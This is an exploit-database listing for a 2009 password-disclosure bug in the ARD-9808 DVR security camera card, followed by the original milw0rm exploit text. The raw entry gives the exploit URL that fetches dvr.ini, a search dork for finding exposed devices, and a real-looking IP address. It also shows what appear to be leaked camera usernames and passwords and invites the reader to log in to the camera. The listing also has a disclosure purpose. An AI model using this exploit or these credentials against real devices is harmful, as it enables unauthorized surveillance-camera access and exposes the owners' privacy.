header-logo
Suggest Exploit
vendor:
ARD-9808 DVR Card Security Camera
by:
Septemb0x
7,5
CVSS
HIGH
Password View Bug
200
CWE
Product Name: ARD-9808 DVR Card Security Camera
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ARD-9808 DVR Card Security Camera Passwords View Bug

A vulnerability in ARD-9808 DVR Card Security Camera allows an attacker to view the passwords of the camera by accessing the dvr.ini file. The dvr.ini file can be accessed by using the exploit http://[sitename-ipadress]/dvr.ini. This vulnerability was discovered by Septemb0x and was published on July 1, 2009.

Mitigation:

The mitigation for this vulnerability is to ensure that the dvr.ini file is not accessible to the public.
Source

Exploit-DB raw data:

-------------------------------------------------
SoftWare Name : ARD-9808 DVR Card Security Camera Passwords View Bug
-------------------------------------------------
Author : Septemb0x
Web Site : www.ozkanbozkurt.com
Procuts Site : http://www.armassa.com.tr/shop/category.php?sid=C2B7D6B59AF75CF88011987A080A46FD&id=87789673
Software Download : http://www.armassa.com.tr/shop/down/ard9808.rar = Open To Rar > DVR > Dvr.ini
D0rk : "To enable control work: Tools->Internet Options->Security->Custom Level   Reset to: Low Or Download"
-------------------------------------------------
Exploit: http://[sitename-ipadress]/dvr.ini
-------------------------------------------------
Example: http://88.249.248.177/dvr.ini
Show;
[PASSWORD]
administrator=
password_a=
user=
password=
enable=0
user0=ozcan = Camera Username
password0=3893 = Camera Password
right0=223
encode=1
num=2
user1=yurt
password1=yurt
right1=223
.
.
.
... Login The Camera :)
-------------------------------------------------
Greetz : BHDR, BARCOD3
-------------------------------------------------

# milw0rm.com [2009-07-01]

Navigation

Suggest Exploit

Services By CQR